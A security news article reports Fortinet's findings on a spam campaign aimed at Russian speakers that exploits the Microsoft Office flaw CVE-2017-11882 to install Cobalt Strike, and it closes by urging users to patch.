What is Cobalt malware? Hackers exploit 17-year-old Microsoft Office flaw to hijack PCs
"Threat actors are always on the lookout for vulnerabilities to exploit and use them for malware campaigns like this," Fortinet researchers said.
Security researchers have found hackers are exploiting a Microsoft Office vulnerability that existed for 17 years to distribute malicious malware capable of hijacking an infected system. Researchers at Fortinet said threat actors have been using the CVE-2017-11882 exploit, a remote code execution vulnerability in Microsoft Office that has been active for nearly a decade, but was only recently disclosed and patched by the company earlier in November.
The vulnerability can be exploited by attackers to run arbitrary code and potentially take full control of the system to execute commands and extract files.
"As we have repeatedly seen, not long after its disclosure threat actors were quick to take advantage of this vulnerability to deliver a malware using a component from a well-known penetration testing tool, Cobalt Strike," the researchers said.
This malware campaign targets Russian speakers with a spam email that claims to be a notification email from Visa regarding some rule changes for the payWave service in Russia. However, the email contains a password-protected RTF document with login credentials provided in the email to unlock it.
"This is to prevent auto-analysis systems from extracting the malicious files for sandboxing and detection," Fortinet researchers Jasper Manual and Joie Salvio wrote. "Since a copy of the malicious document is out in the open... it's possible that this is only to trick the user into thinking that securities are in place, which is something one would expect in an email from a widely used financial service."
Once the document is opened, the user is met with a plain document with the words "Enable Editing". Meanwhile, a PowerShell script runs in the background to download the Cobalt Strike client and take control of the infected system.
Hackers can then "control the victim's system and initiate lateral movement procedures in the network by executing a wide array of commands", the researchers said.
"Threat actors are always on the lookout for vulnerabilities to exploit and use them for malware campaigns like this," the Fortinet researchers wrote. "This goes both for new and old vulnerabilities, whether they have been published or not. We frequently see malware campaigns that exploit vulnerabilities that have been patched for months or even years.
"This may have come from an assumption that there are still a significant number of users out there that don't take software updates seriously, which sadly, is far too often the case."
Microsoft Office users have been advised to download the patch for the CVE-2017-11882 vulnerability and update their systems immediately.